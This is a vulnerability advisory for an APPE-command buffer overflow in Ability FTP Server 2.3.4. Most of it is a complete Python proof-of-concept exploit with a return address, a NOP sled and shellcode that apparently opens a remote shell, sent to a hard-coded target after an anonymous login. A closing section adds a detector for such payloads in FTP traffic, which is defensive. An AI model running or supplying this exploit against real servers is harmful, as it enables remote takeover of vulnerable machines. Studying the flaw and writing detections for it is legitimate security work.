Buffer Overflow in Ability FTP

A vulnerability has been discovered in Code Crafter's Ability FTP Server version 2.3.4. It is a remotely exploitable buffer overflow in the handling of the APPE command. An attacker could craft packets that, with the use of shellcode, overflow the buffer and gain root privileges on the vulnerable system.
The vendor has been notified of this vulnerability. The remediation path suggested by the vendor is to upgrade to the latest version of Ability FTP Server. Because proof-of-concept code has been identified in the wild, the vendor suggests upgrading to the most recent version immediately.
Below is proof-of-concept code written in Python. The return address used to overwrite EIP is for Windows 2000 Service Pack 4. The proof-of-concept code contained here is strictly for educational purposes only.
#!/usr/bin/python
# (Python 2 syntax: the string literals below are byte strings)
#########################################
#                                       #
#   Ability FTP Buffer Overflow         #
#                                       #
#   Requirements:                       #
#     Ability FTP Server 2.3.4          #
#                                       #
#   FOR EDUCATIONAL PURPOSES ONLY!      #
#                                       #
#   Jeremiah Talamantes                 #
#   labs@redteamsecure.com              #
#   http://www.redteamsecure.com/labs   #
#                                       #
#########################################
import socket
# Fill the buffer up to the saved return address (966 bytes of 'A')
buffer="\x41"*966
# Overwrite EIP with a jmp esp in shell32.dll (0x7ca58265, written little-endian)
# Change as needed for the target's service pack
buffer+="\x65\x82\xa5\x7c"
# 16 bytes of 'C' following the return address
buffer+="\x43"*16
# NOP sled
buffer+="\x90"*16
# Replace with your own shellcode
buffer+=("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6"
"\xff\xd0")
# Trailing filler (0xCC, int3 instructions)
buffer+="\xCC"*950
# Connect to the FTP control port and send the payload as the APPE argument
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# Change IP address as needed
s.connect(('192.168.9.97',21))
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send('APPE '+buffer+'\r\n')
#s.recv(1024)
#s.send('QUIT\r\n')
s.close()
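As an added detection example that is not part of the advisory or the author's code: a small checker for FTP control-channel command lines that flags APPE arguments with the traits of the payload above (far longer than any pathname and containing non-printable bytes). The length threshold and the sample session are constructed assumptions.

```python
# Added example (not from the advisory): flags FTP control-channel lines
# whose APPE argument looks like the overflow payload described above.
# Threshold and sample data are assumptions constructed for this example.
MAX_ARG_LEN = 512  # assumption: real pathnames are far shorter than the 966-byte filler


def inspect_ftp_command(line: bytes) -> dict:
    """Classify one CRLF-terminated FTP command line (RFC 959 framing)."""
    stripped = line.rstrip(b"\r\n")
    verb, _, arg = stripped.partition(b" ")
    # FTP verbs are 3 or 4 ASCII letters; anything else is malformed.
    if not (3 <= len(verb) <= 4 and verb.isalpha()):
        return {"verb": None, "suspicious": True, "reason": "malformed command"}
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("argument length %d exceeds %d" % (len(arg), MAX_ARG_LEN))
    # Pathnames are printable ASCII; NOP sleds and shellcode are not.
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append("non-printable bytes in argument")
    return {
        "verb": verb.upper().decode("ascii"),
        "suspicious": bool(reasons),
        "reason": "; ".join(reasons),
    }


def scan_session(lines):
    """Return (line index, reason) for each APPE command that should be alerted on."""
    alerts = []
    for i, line in enumerate(lines):
        verdict = inspect_ftp_command(line)
        if verdict["verb"] == "APPE" and verdict["suspicious"]:
            alerts.append((i, verdict["reason"]))
    return alerts


# Constructed sample session: anonymous login, a legitimate append, then a
# payload shaped like the advisory's (966 filler bytes + NOP sled + 0xCC tail).
SAMPLE_SESSION = [
    b"USER ftp\r\n",
    b"PASS ftp\r\n",
    b"APPE report.txt\r\n",
    b"APPE " + b"A" * 966 + b"\x90" * 16 + b"\xCC" * 950 + b"\r\n",
]

if __name__ == "__main__":
    for index, reason in scan_session(SAMPLE_SESSION):
        print("line %d: suspicious APPE (%s)" % (index, reason))
```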